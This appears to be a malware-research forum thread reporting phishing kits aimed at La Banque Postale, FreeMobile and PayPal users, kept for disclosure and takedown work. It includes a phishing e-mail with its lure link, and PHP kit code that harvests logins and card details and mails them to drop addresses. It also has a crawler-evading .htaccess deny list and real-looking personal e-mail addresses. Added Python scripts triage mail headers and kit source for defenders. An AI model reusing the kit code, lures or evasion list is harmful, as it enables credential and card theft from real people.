<TD style=3D"PADDING-BOTTOM: 5px; LINE-HEIGHT: 15px; FONT-FAMILY: LucidaGra=
nde, tahoma, verdana, arial, sans-serif; FONT-SIZE: 11px">
<P><B style=3D"LINE-HEIGHT: 15px; FONT-WEIGHT: bold"><FONT style=3D"LINE-HE=
IGHT: normal; FONT-SIZE: 16pt" size=3D4><SPAN style=3D"TEXT-ALIGN: left; WI=
DOWS: 1; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IND=
ENT: 0px; DISPLAY: inline !important; FONT: 13px/19px helvetica, arial, san=
s-serif; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: r=
gb(20,24,35); WORD-SPACING: 0px; font-stretch: normal"><B style=3D"LINE-HEI=
GHT: 18px; FONT-WEIGHT: bold">N</B>ous avons d=E9tect=E9 une activit=
=E9 suspecte sur votre compte la banque postale et l'avons temporairement v=
errouill=E9 par pr=E9caution=2E</SPAN></FONT></B></P>
<P><B style=3D"LINE-HEIGHT: 15px; FONT-WEIGHT: bold"><FONT style=3D"LINE-HE=
IGHT: normal; FONT-SIZE: 16pt" size=3D4><SPAN style=3D"TEXT-ALIGN: left; WI=
DOWS: 1; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IND=
ENT: 0px; DISPLAY: inline !important; FONT: 13px/19px helvetica, arial, san=
s-serif; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: r=
gb(20,24,35); WORD-SPACING: 0px; font-stretch: normal"><STRONG><FONT size=
=3D3>N</FONT></STRONG><SPAN style=3D"TEXT-ALIGN: left; WIDOWS: 1; TEXT-TRAN=
SFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; DISPLAY:=
 inline !important; FONT: 14px/20px helvetica, arial, sans-serif; WHITE-SPA=
CE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: rgb(20,24,35); WORD=
-SPACING: 0px; -webkit-text-stroke-width: 0px">ous fournissons des outils q=
ui contribuent =E0 votre s=E9curit=E9 lorsque vous utilisez la banque posta=
le=2E</SPAN></SPAN></FONT></B></P></TD>
</TR>
</TBODY>
</TABLE></P>
<P>&nbsp;&nbsp;<A href=3D"http://70=2E90=2E126=2E5/boro=2Ehtml">Prot=
=E9gez votre compte maintenant</A></P>
<P>&nbsp;Merci de la confiance que vous nous t=E9moignez <BR>Cordialement,<=
/P><!--  //--><!-- --><!--  //--><!-- -->
<META>
<META><!-- Wrapper stretching to the width of the viewable space -->
<TABLE style=3D"BACKGROUND-COLOR: #ffffff; FONT-FAMILY: Arial, Helvetica, V=
erdana; COLOR: #222222; font-: 12px" class=3DwrapperBG border=3D0 cellSpaci=
ng=3D0 cellPadding=3D0 width=3D"100%">
<TBODY>
<TR>
<TD style=3D"PADDING-BOTTOM: 10px; BACKGROUND-COLOR: #ffffff; PADDING-LEFT:=
 10px; PADDING-RIGHT: 10px; PADDING-TOP: 10px" dir=3Dltr class=3D"module-co=
ntainer mobile-hidden" vAlign=3Dtop align=3Dmiddle>
<TD style=3D"FONT-SIZE: 11px" dir=3Dltr align=3Dleft><FONT color=3D#ffffff>=
</FONT></TD>
<TR class=3Dsubject>
<TH scope=3Drow><FONT color=3D#ffffff>objet </FONT>
</TH>
<TD id=3DtdReadSubject class=3Dlast colSpan=3D2><FONT color=3D#ffffff>Velko=
mmen til Surftown</FONT></TD>
</TR>
</TBODY>
</TABLE>
<TABLE class=3D"mail-table read">
<TBODY>
<TR class=3Dview-header>
<TD class=3D"last header-details" colSpan=3D3>
<P class=3Dheader-details-link-block><A hideFocus class=3D"ib header-detail=
s-link" href=3D"#"><FONT color=3D#ffffff><SPAN class=3Dview-header-link>voi=
r l'en-t=EAte complet </SPAN><SPAN class=3Dhide-header-link>fermer l'en-t=
=EAte </SPAN></FONT></A></P>
<DIV class=3Dheader-content><FONT color=3D#ffffff><STRONG>Return-Path</STRO=
NG>: <cs@surftown=2Ecom><BR><BR><STRONG>Received</STRONG>: from mwinf=
5c26 (mwinf5c26=2Eme-wanadoo=2Enet [10=2E223=2E111=2E76])<BR>by mwinb1g06 w=
ith LMTPA;<BR>Mon, 22 Jun 2015 17:05:15 +0200<BR><BR><STRONG>X-Sieve</STRON=
G>: CMU Sieve 2=2E3<BR><BR><STRONG>Received</STRONG>: from controlpanel=
=2Esurftown=2Ecom ([212=2E97=2E130=2E36])<BR>by mwinf5c26 with ME<BR>id jT5=
F1q0030nFlhg01T5FwH; Mon, 22 Jun 2015 17:05:15 +0200<BR><BR><STRONG>X-bcc</=
STRONG>: cairequejaime@orange=2Efr<BR><BR><STRONG>X-ME-bounce-domain</STRON=
G>: orange=2Efr<BR><BR><STRONG>X-ME-engine</STRONG>: default<BR><BR><STRONG=
>X-me-spamcause</STRONG>: (0)(0000)gggruggvucftvghtrhhoucdtuddrfeekvddrudef=
gdekgecutefuodetggcurfhrohhfihhlvgemucfogfdpggftiffpkfenuceurghilhhouhhtmec=
ugedtt<BR>denucenucfjughrpefvufffhffkrffoggfgtgeshhektddthedtjeenucfhrhhomh=
epufhurhhfthhofihnuceotghssehsuhhrfhhtohifnhdrtghomheqnecuffhomhg<BR>rihhnp=
ehsuhhrfhhtohifnhdrtghomhenucfrrghrrghmpehhvghloheptghonhhtrhholhhprghnvghl=
rdhsuhhrfhhtohifnhdrtghomhdpihhnvghtpedvuddvrdelj<BR>edrudeftddrfeeipdhmrgh=
ilhhfrhhomheptghssehsuhhrfhhtohifnhdrtghomhdprhgtphhtthhopegtrghirhgvqhhuvg=
hjrghimhgvsehorhgrnhhgvgdrfhhr<BR><BR><STRONG>X-me-spamlevel</STRONG>: not-=
spam<BR><BR><STRONG>X-ME-Helo</STRONG>: controlpanel=2Esurftown=2Ecom<BR><B=
R><STRONG>X-ME-IP</STRONG>: 212=2E97=2E130=2E36<BR><BR><STRONG>X-ME-Entity<=
/STRONG>: ofr<BR><BR><STRONG>Received</STRONG>: by controlpanel=2Esurftown=
=2Ecom (Postfix, from userid 33)<BR>id E1F2DD4007C; Mon, 22 Jun 2015 17:05:=
14 +0200 (CEST)<BR><BR><STRONG>To</STRONG>: cairequejaime@orange=2Efr<BR><B=
R><STRONG>Subject</STRONG>: Velkommen til Surftown<BR><BR><STRONG>X-PHP-Ori=
ginating-Script</STRONG>: 33:class=2Ephpmailer=2Ephp<BR><BR><STRONG>Date</S=
TRONG>: Mon, 22 Jun 2015 17:05:14 +0200<BR><BR><STRONG>From</STRONG>: Surft=
own <cs@surftown=2Ecom><BR><BR><STRONG>Message-ID</STRONG>: <93599=
f5caee009d1286e9c7cde0ada5c@controlpanel=2Esurftown=2Ecom><BR><BR><STRON=
G>X-Priority</STRONG>: 3<BR><BR><STRONG>X-Mailer</STRONG>: PHPMailer 5=
=2E2=2E2 (http://code=2Egoogle=2Ecom/a/apache-extras=2Eorg/p/phpmailer/)<BR=
><BR><STRONG>MIME-Version</STRONG>: 1=2E0<BR><BR><STRONG>Content-Transfer-E=
ncoding</STRONG>: 8bit<BR><BR><STRONG>Content-Type</STRONG>: text/html; cha=
rset=3Dutf-8 </FONT></DIV></TD>
</TR>
</TBODY>
</TABLE>
<DIV class=3Dmail-content-readonly>
<TABLE class=3Dmail-content-readonly-table>
<TBODY>
<TR>
<TD>
<DIV id=3Dmessage class=3Dmail-content-read>
<H1 style=3D"LINE-HEIGHT: 24px; FONT-FAMILY: Helvetica,Arial,sans-serif; CO=
LOR: #333333; FONT-SIZE: 24px; FONT-WEIGHT: 300"><FONT color=3D#ffffff>Velk=
ommen til Surftown</FONT></H1>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff>Hej stret</FONT></P>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff>Velkommen til Surftown!=
 Vi er glade for, at du har valgt Surftown som webhotel til din hjemmeside =
og e-mail=2E</FONT></P>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff>Indenfor de n=E6ste 5 m=
inutter bliver dit webhotel oprettet, og du vil modtage en e-mail fra med l=
ogin-oplysninger til vores kontrolpanel=2E I kontrolpanelet kan du administ=
rere dit webhotel og dine dom=E6ner=2E Fra kontrolpanelet kan du ogs=
=E5 kontakte supporten=2E</FONT></P>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff><STRONG>Office 365</STR=
ONG><BR>Hvis du har bestilt et produkt der indeholder Office 365, s=E5 vil =
du modtage en separat email herom indenfor 24 timer=2E Dit Office 365 produ=
kt fornyes =E5rligt sammen med dit webhotel, og kan opsiges =E5rligt ved fo=
rnyelsestidspunktet=2E</FONT></P>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff><STRONG>F=F8lg os p=
=E5 de sociale medier</STRONG><BR>Mens du venter p=E5 at dit webhotel blive=
r klar, kan du med fordel bruge et par minutter p=E5 at f=F8lge Surftown p=
=E5 </FONT><A href=3D"http://go=2Esurftown=2Ecom/track/facebook/?m=3D{$clie=
nt=2Eemail}" target=3D_blank><FONT color=3D#ffffff>Facebook</FONT></A><FONT=
 color=3D#ffffff>, </FONT><A href=3D"http://go=2Esurftown=2Ecom/track/twitt=
er/?m=3D{$client=2Eemail}" target=3D_blank><FONT color=3D#ffffff>Twitter</F=
ONT></A><FONT color=3D#ffffff> og </FONT><A href=3D"http://go=2Esurftown=
=2Ecom/track/googleplus/?m=3D{$client=2Eemail}" target=3D_blank><FONT color=
=3D#ffffff>Google+</FONT></A><FONT color=3D#ffffff>=2E</FONT></P>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff>Her kan du l=F8bende bl=
ive opdateret om nye produkter og tjenester fra Surftown, samt f=E5 gode r=
=E5d til hvordan du f=E5r mest muligt ud af dit webhotel=2E Du vil ogs=
=E5 kunne holde dig opdateret p=E5 den aktuelle drift og deltage i konkurre=
ncer=2E</FONT></P>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff><STRONG>Sp=F8rgsm=
=E5l?</STRONG><BR>Hvis du har sp=F8rgsm=E5l, s=E5 kontakt gerne vores salgs=
afdeling p=E5 telefon +45 70 70 24 74=2E Salgsafdelingen kan tr=E6ffes alle=
 hverdage mellem klokken 9 og 16=2E</FONT></P>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff>Du er ogs=E5 velkommen =
til at kontakte os her:<BR></FONT><A href=3D"https://controlpanel=2Esurftow=
n=2Ecom/tickets/new/&languagechange=3DDanish" target=3D_blank><FONT color=
=3D#ffffff>https://controlpanel=2Esurftown=2Ecom/tickets/new/</FONT></A></P=
>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff>Tak for din bestilling=
=2E</FONT></P>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff>Venlig hilsen,<BR>Surft=
own</FONT></P></DIV></TD>
</TR>
</TBODY>
</TABLE></DIV></BODY>
</html>
----=BOUNDARY_831132_LOBO_QLJV_BWBV_UVIN--
70.90.126.5/boro.html is redirecting to spendwisor.com

• dns: 1 ›› ip: 192.163.243.139 - adress: SPENDWISOR.COM
Hijacked host, SSL support too.

Phishing kit coded by a 9yo, CSS is very dirty, copy in the attachment.
VT: 2/63 - UQ
ID PhishTank: { #3430752 | #3430751 }
Code:
$send = "kymco.ksiwan@gmail.com"; 
--
Edit: Now CAF (Caisse d'Allocations Familiales) targeted too, without forgetting DGFIP. (thx to Yafnag for the notice :þ)
Hijacked host, still with SSL.
• dns: 1 ›› ip: 67.225.195.163 - adress: LEHUAJEWELERS.COM
• dns: 1 ›› ip: 62.219.197.106 - adress: ECOSTORE.CO.IL
Code:
$send = "crypto.rb3@gmail.com";
$send = "rabiiejackson1@gmail.com";
$TO = "rayanetouati50@hotmail.com"; 
ID PhishTank: { #3430914 | #3430915 | #3430916 | #3430917 | #3430918 | #3430919 }
Attachments
infected
(4.37 MiB) Downloaded 62 times
infected
(678.96 KiB) Downloaded 59 times
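Added example (editor's note, not code posted by Xylitol or anyone else in this thread): the header triage the two posts above do by hand, done with the Python standard library. It covers both the "Some mailers" X-PHP-Script lines of post #26579 and the EDF/LBP raw mails of post #26629: walk the Received chain to the injecting host, read the X-PHP-Script header that names the compromised PHP mailer, decode the quoted-printable HTML part to pull out the phishing link, and decode the base64 tracking header. RAW_MAIL is constructed to mirror the shape of the headers quoted in the thread; every host, IP, address and id in it is a placeholder.

```python
"""Triage of a raw phishing e-mail with the Python standard library only.
Added example for this thread, not code posted by any of its authors.
RAW_MAIL is CONSTRUCTED to mirror the shape of the headers quoted in the
thread; every host, IP, address and id in it is a placeholder."""
import base64
import email
import ipaddress
import re
from email import policy
from html.parser import HTMLParser

RAW_MAIL = b"""\
Received: from mx.example-hotmail.test ([203.0.113.10]) by inbox.example.test
\t with SMTP; Mon, 31 Aug 2015 11:01:00 -0700
Received: from localhost (localhost.localdomain [127.0.0.1])
\tby mx.example-hotmail.test (Postfix) with ESMTP id PLACEHOLDER1;
\tThu, 27 Aug 2015 14:45:09 +1000 (EST)
Received: from vps-placeholder (host.placeholder.test [198.51.100.7])
\tby mx.example-hotmail.test (Postfix) with ESMTPA id PLACEHOLDER2;
\tThu, 27 Aug 2015 08:21:40 +1000 (EST)
X-PHP-Script: compromised-site.test/wp-admin/includes/mailer.php for 198.51.100.7
From: "Votre espace Client" <service@example.test>
To: victim@example.test
Subject: =?iso-8859-1?Q?Votre_demande_d'adh=E9sion_en_ligne_?=
X-Bounce-Tracking-Info: <aWQ6NDIJdmljdGlt>
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="BOUNDARY_CONSTRUCTED"

--BOUNDARY_CONSTRUCTED
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

cher(e) client(e), prot=E9gez votre compte maintenant
--BOUNDARY_CONSTRUCTED
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

<HTML><BODY><P><A href=3D"http://203.0.113.55/boro=2Ehtml">Prot=
=E9gez votre compte maintenant</A></P></BODY></HTML>
--BOUNDARY_CONSTRUCTED--
"""

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Loopback and RFC 1918 only: ipaddress.is_private would also swallow the
# documentation ranges (TEST-NET) used for the placeholders above.
INTERNAL = [ipaddress.ip_network(n) for n in
            ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_mail(raw: bytes):
    return email.message_from_bytes(raw, policy=policy.default)


def received_hops(msg):
    """[(helo_name, ip)] oldest first, i.e. the path the mail really took."""
    hops = []
    for value in msg.get_all("Received", []):
        text = re.sub(r"\s+", " ", str(value))          # unfold the header
        m = re.search(r"from (\S+)(.*?) by ", text)
        if not m:
            continue
        ips = IPV4.findall(m.group(2))
        hops.append((m.group(1), ips[0] if ips else None))
    return list(reversed(hops))


def injecting_hop(msg):
    """First hop that is neither loopback nor RFC 1918: the box that handed
    the mail to the first public MTA (the one to report to its hoster)."""
    for name, ip in received_hops(msg):
        if ip and not any(ipaddress.ip_address(ip) in net for net in INTERNAL):
            return name, ip
    return None


def mailer_script(msg):
    """X-PHP-Script (added by the sendmail wrapper on some shared hosts) names
    the PHP script that sent the mail and the client IP(s) that drove it."""
    value = msg.get("X-PHP-Script")
    if not value:
        return None
    script, _, clients = str(value).partition(" for ")
    return script.strip(), [c.strip() for c in clients.split(",") if c.strip()]


class _Links(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs.extend(v for k, v in attrs if k == "href" and v)


def html_links(msg):
    """Decode the text/html part (quoted-printable + charset) and list hrefs."""
    part = msg.get_body(preferencelist=("html",))
    if part is None:
        return []
    parser = _Links()
    parser.feed(part.get_content())
    return parser.hrefs


def tracking_record(msg):
    """The bulk mailer's per-recipient record: base64 of tab-separated fields."""
    value = msg.get("X-Bounce-Tracking-Info")
    if not value:
        return None
    blob = str(value).strip().strip("<>")
    return base64.b64decode(blob).decode("utf-8", "replace").split("\t")


def triage(raw: bytes) -> dict:
    msg = parse_mail(raw)
    return {
        "subject": str(msg["Subject"]).strip(),   # RFC 2047 word decoded by the policy
        "hops": received_hops(msg),
        "injecting_hop": injecting_hop(msg),
        "mailer_script": mailer_script(msg),
        "links": html_links(msg),
        "tracking_record": tracking_record(msg),
    }


if __name__ == "__main__":
    for key, val in triage(RAW_MAIL).items():
        print(f"{key}: {val}")
```

To use it on a real sample, replace RAW_MAIL with the bytes of a saved .eml. The injecting hop is what goes to the hoster's abuse desk, the X-PHP-Script path is the file the hoster has to clean, and the links are what goes to PhishTank and, for CloudFlare-fronted domains, to the abuse form mentioned above.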
 #26796  by malwarelabs
 Thu Sep 24, 2015 2:46 pm
FreeMobile:
hXXp://aimants-et-idees.fr/error/
hXXp://59.188.15.232/errors/mobile.free.fr/c195c5e7cbcf52ec23192b0b26f9d63a/moncompte/?v=714007b36db7964ea22e40e127b73a9a
files at http://59.188.15.232/errors/mobile.free.fr.zip
Code:
$_SESSION['namecc'] = $_POST['comname'];
$_SESSION['numcc']=$_POST['comnum'];
$_SESSION['mois']=$_POST['common'];
$_SESSION['year']=$_POST['comy'];
$_SESSION['cvv']=$_POST['comc'];
$mail="crypter--@hotmail.com";
$rx = "
-------------------+ FreeMobile 2014 +-------------------
User: ".$_SESSION['id']."
Pass: ".$_SESSION['pass']."
-------------------+ confirmation login +-------------------
User: ".$_SESSION['id2']."
Pass: ".$_SESSION['pass2']."
--------------------------------------
Holder Name: ".$_SESSION['namecc']."
Number: ".$_SESSION['numcc']."
Date: ".$_SESSION['mois']." / ".$_SESSION['year']."
CVV: ".$_SESSION['cvv']."
--------------------------------------
IP      : ".$ip."
HOST    : ".gethostbyaddr($ip)."
BROWSER : ".$_SERVER['HTTP_USER_AGENT']."
-------------------+ FreeMobile 2014 +-------------------
";
mail($mail,"Free results baby".$_SESSION['numcc'],$rx);
Attached
Attachments
infected
(304.47 KiB) Downloaded 58 times
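Added example (editor's note, not code from the thread or from any kit): the `$to` / `$send` / `$TO` / `$mail` lines quoted in posts #26579, #26629 and #26796 are what a hoster cleaning a hijacked server wants pulled out automatically, together with the `$_SESSION[...] = $_POST[...]` lines that show what the form harvests. This is a small static triage over PHP source, in Python, that resolves which drop addresses actually reach `mail()` and flags card-data collection. KIT_SOURCE is constructed after the snippets above (including the PayPal kit's quote that closes on the next line); all addresses in it are placeholders.

```python
"""Static triage of a PHP phishing kit: drop addresses and harvested fields.
Added example for this thread, not code from the thread or from any kit.
KIT_SOURCE is CONSTRUCTED after the snippets quoted in the thread; every
address in it is a placeholder."""
import re
from pathlib import Path

KIT_SOURCE = r'''<?php
$to      = 'drop-one@example.test
';
$send = "drop-two@example.test";
$TO = "drop-four@example.test";
$_SESSION['namecc'] = $_POST['comname'];
$_SESSION['numcc']=$_POST['comnum'];
$_SESSION['cvv']=$_POST['comc'];
$mail="drop-three@example.test";
$rx = "Holder Name: ".$_SESSION['namecc']." Number: ".$_SESSION['numcc'];
mail($mail,"results ".$_SESSION['numcc'],$rx);
mail($send, "login", $rx);
?>'''

# $var = "addr@host";  the closing quote may sit on the next line (the
# PayPal kit quoted in the thread does exactly that), hence re.S and \s*.
ASSIGN = re.compile(r"\$(\w+)\s*=\s*(['\"])\s*([^'\"\s]+@[^'\"\s]+)\s*\2", re.S)
# mail($var, ...)  -- first argument is the recipient
MAIL_CALL = re.compile(r"\bmail\s*\(\s*\$(\w+)\s*,")
# $_SESSION['key'] = $_POST['field'];  -- what the form collects
HARVEST = re.compile(
    r"\$_SESSION\[\s*['\"](\w+)['\"]\s*\]\s*=\s*\$_POST\[\s*['\"](\w+)['\"]\s*\]")
CARD_HINTS = ("cc", "cvv", "cvc", "card", "pan")


def drop_addresses(src: str) -> dict:
    """PHP variable name -> e-mail literal assigned to it."""
    return {var: addr for var, _quote, addr in ASSIGN.findall(src)}


def mailed_to(src: str) -> list:
    """Addresses that actually reach mail(); a recipient variable we cannot
    resolve to a literal is reported as '$name' for manual follow-up."""
    known = drop_addresses(src)
    return sorted({known.get(var, "$" + var) for var in MAIL_CALL.findall(src)})


def harvested_fields(src: str) -> list:
    """[(session_key, post_field)] pairs copied from the form."""
    return HARVEST.findall(src)


def steals_card_data(src: str) -> bool:
    return any(hint in key.lower()
               for key, _field in harvested_fields(src) for hint in CARD_HINTS)


def triage_kit(src: str) -> dict:
    return {
        "drop_addresses": drop_addresses(src),
        "mailed_to": mailed_to(src),
        "harvested": harvested_fields(src),
        "steals_card_data": steals_card_data(src),
    }


def scan_tree(root) -> dict:
    """Triage every .php file below root; keep only files with findings."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        result = triage_kit(path.read_text(errors="replace"))
        if result["drop_addresses"] or result["harvested"]:
            findings[str(path)] = result
    return findings


if __name__ == "__main__":
    for key, val in triage_kit(KIT_SOURCE).items():
        print(f"{key}: {val}")
```

`scan_tree` is the form to run over an unpacked kit or a web root: a file that both assigns an address literal and copies `$_POST` into `$_SESSION` is worth a look even when the kit's own file names are innocuous.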
 #27887  by benkow_
 Wed Feb 17, 2016 9:57 am
Paypal phishing kit
http://www.xarajp\.com/Confirmation.Udapte.zip
Code:
<?php
# Don't touch !
################# DaLi TN ########################
################ # # # # # # # # # # # # # #  ########################
################ Any problems contact me Here : ###################### 
################ # # # # # # # # # # # # # # #  ######################
### Profil : https://www.facebook.com/No.Love.No.Woman.No.Problems ###
##### Group : https://www.facebook.com/groups/YaSser127.0.0.1/ #######
############## # # # # # # # # # # # # # #  # # # # # # ##############
##################       DaLi TN       #############################
############## # # # # # # # # # # # # # # # # # #####################
################# DaLi TN  ########################
/*
 */
/*
Option Send Email :
1 : Send Email.
0 : Don't Send Email.
Option Ftp Write
1 : FTP Write.
0 : Don't FTP Save Result.
*/
$Send_Email = 1;
$Ftp_Write = 1;
//   <============================= Your Email =============================>
$to      = 'aminescormix7@gmail.com
';
//   <============================= Your Email =============================>
?>
htaccess:
Code:
<Limit GET POST> 

order allow,deny 

deny from 209.85.32.23        # totaldomaindata (checkmark) 

deny from 66.205.64.22

deny from 98.247.136.154

deny from 178.25.218.88

deny from 98.247.136.154

deny from 63.229.4.212

deny from 66.135.207.155

deny from 66.77.136.153

deny from 64.122.169.98

deny from 54.217.8.129

deny from 38.100.21.113

deny from 96.47.226.21

deny from 54.197.81.106

deny from 68.168.131.216

deny from 65.17.253.220

deny from 78.151.209.28

deny from 66.135.207.155

deny from 207.102.138.158

deny from 209.139.197.125

deny from 66.77.136.153

deny from 66.77.136.123

deny from 72.64.146.136

deny from 124.178.234.95

deny from 67.15.182.35 

deny from 203.68.             # taiwan academic network 

deny from 218.58.124.         # china jpg giftsite spammer 

deny from 218.58.125. 

deny from 62.194.7.           # NE spambot 

deny from 85.17.6.            # netherlands 

deny from 194.213.            # czech norway sweden etc 

deny from 64.27.2.18          # SEO masked as SE 

deny from 64.27.2.19          # SEO masked as SE 

deny from 212.187.116.        # clown from Netherlands siphoning bible site 

deny from 84.87.              # clown from Netherlands siphoning bible site 

deny from 222.252.            # vietnam spammer 

deny from 203.160.1.          # vietnam spammer 

deny from 82.60.1.            # spamming Italy block 

deny from 68.46.186.93        # clown on comcast 

deny from 65.254.33.130       # unknown spain bot 

deny from 82.131.195.         # hungarian BS bot 

deny from 217.153.            # poland 

deny from 202.108.252.        # repeated merch spam! 

deny from 82.208.             # czech russia romania etc 

deny from 193.47.80.41        # BW sucking bot 

deny from 66.234.139.194      # bogus crawler 

deny from 80.96.              # romania 

deny from 66.232.98.76        # unknown bot 

deny from 38.112.6.182        # cosmixcorp.com 

deny from 82.165.252.147      # unknown Java BW waster 

deny from 67.79.102.28        # blacklisted spammer 

deny from 220.181.26.         # sohu bot 

deny from 64.62.136.196       # unknown stealth bot 

deny from 62.163.             # netherlands 

deny from 195.113.            # czech 

deny from 213.185.106.        # nigeria 

deny from 213.185.107.        # nigeria 

deny from 67.184.49.166       # blacklisted IP 

deny from 219.95.             # malaysia 

deny from 66.221.106.76       # mydropbox.com 

deny from 81.93.165.          # norway bot 

deny from 81.223.254.         # austrian bs bot 

deny from 87.123.74.          # patwebbot 

deny from 62.193.213.         # french BS bot 

deny from 86.120.             # romania 

deny from 86.121. 

deny from 86.122. 

deny from 86.123. 

deny from 86.124. 

deny from 86.125. 

deny from 86.126. 

deny from 86.127. 

deny from 220.194.54.         # BS bandwidth wasting bot 

deny from 210.51.167.         # BS bot 

deny from 204.14.48.          # stealth bots webhost etc
deny from 66.180.170.47       # development bot
deny from 217.160.75.202      # bot rips way too fast
deny from 84.12.54.237        # unknown clown UK
deny from 65.19.154.24        # stealth bandwidth hog
deny from 216.32.73.122       # stealth bot
deny from 63.160.77.236       # stealth bot
deny from 12.44.181.220       # unknown bot
deny from 12.44.172.92        # stealth bot
deny from 139.18.2.           # findlinks bot
deny from 70.85.193.178       # unknown bot
deny from 82.80.              # israel
deny from 82.81.
deny from 213.180.128.        # poland
deny from 213.180.129.
deny from 213.180.130.
deny from 213.180.131.
deny from 66.150.55.230       # findwhat.com stealth bot
deny from 67.15.175.114       # unknown bot
deny from 217.113.244.119     # spanish SE
deny from 194.224.199.        # private spanish server
deny from 81.19.66.           # russia
deny from 213.176.126.        # iran
deny from 208.223.208.181     # security-lab1.juniper.net
deny from 208.223.208.182
deny from 208.223.208.183
deny from 208.223.208.184
deny from 208.223.208.185
deny from 67.167.114.21       # BS law-x.com scraper site bot
deny from 194.44.42.          # ukraine
deny from 209.203.192.        # Expedite Marketing
deny from 209.203.193.
deny from 209.203.194.
deny from 209.203.195.
deny from 209.203.196.
deny from 209.203.197.
deny from 209.203.198.
deny from 209.203.199.
deny from 209.203.200.
deny from 209.203.201.
deny from 209.203.202.
deny from 209.203.203.
deny from 209.203.204.
deny from 209.203.205.
deny from 209.203.206.
deny from 209.203.207.
deny from 64.62.175.          # unknown bandwidth sucker
deny from 219.136.171.        # china unknown bot
deny from 216.150.24.122      # sonicleads.com spambot
deny from 216.150.24.123
deny from 210.14.32.          # annoying philipines spammer
deny from 220.132.126.        # taiwan useragent = 3
deny from 66.194.6.           # websense.com bandwidth waster
deny from 12.17.130.27        # sitesucker
deny from 65.164.129.91
deny from 207.155.199.163
deny from 208.252.91.3
deny from 198.54.             # south africa scams, spam, etc
deny from 66.132.132.63       # securityspace.com
deny from 81.18.32.           # nigeria
deny from 81.18.33.
deny from 81.18.34.
deny from 81.18.35.
deny from 81.18.36.
deny from 81.18.37.
deny from 81.18.38.
deny from 81.18.39.
deny from 81.18.40.
deny from 81.18.41.
deny from 81.18.42.
deny from 81.18.43.
deny from 81.18.44.
deny from 81.18.45.
deny from 81.18.46.
deny from 81.18.47.
deny from 192.115.134.        # Israel, hacker heaven
deny from 65.11.200.242       # direct revenue bot
deny from 65.75.128.30        # fotopages.com
deny from 204.8.168.          # gator.com
deny from 204.8.169.
deny from 204.8.170.
deny from 204.8.171.
deny from 64.152.73.
deny from 66.111.48.80        # spambot from russia
deny from 68.211.2.61         # clown using site copier on books
deny from 64.42.84.70         # addresses.com spambot
deny from 67.127.13.70        # clown hitting with gethtmlcontents3 from secure site
deny from 80.230.             # israel
deny from 80.250.32.          # nigeria
deny from 80.250.33.
deny from 80.250.34.
deny from 80.250.35.
deny from 80.250.36.
deny from 80.250.37.
deny from 80.250.38.
deny from 80.250.39.
deny from 80.250.40.
deny from 80.250.41.
deny from 80.250.42.
deny from 80.250.43.
deny from 80.250.44.
deny from 80.250.45.
deny from 80.250.46.
deny from 80.250.47.
deny from 69.28.130.          # quepasa.com
deny from 213.8.              # israel
deny from 64.42.105.          # unknown speed bot
deny from 141.85.             # romania
deny from 128.238.55.         # polybot
deny from 67.68.89.           # unknown masking bot
deny from 66.36.242.25        # unknown bot
deny from 81.199.             # israel nigeria etc
deny from 195.111.            # hungary
deny from 192.115.106.        # clown from Israel speed downloading
deny from 204.94.59.          # brandimensions.com bandwidth waster
deny from 12.209.181.242      # speed ripping unknown agent
deny from 217.73.             # romania ukraina russia etc
deny from 217.218.            # iran
deny from 217.219.            # iran
deny from 216.53.84.61        # mail.mccarter.com
deny from 169.132.149.100     # www.mccarter.com - new jersey law firm
deny from 213.226.16.         # bulgaria
deny from 216.252.167.        # idiot from Ghana demands free merch for many emails
deny from 65.102.             # WebContent Internatioanl
deny from 216.163.255.1       # rpa.metlife.com bored employees
deny from 67.127.164.125      # DSL bandwidth waster
deny from 193.253.199.        # france SE art-online.com bandwidth waster
deny from 80.179.254.         # clown from Israel using downloader
deny from 64.37.103.          # spambots and other non customers
deny from 69.61.12.100        # spambot from servershost.net
deny from 69.61.12.101
deny from 66.246.43.167
deny from 64.124.14.          # markmonitor.com
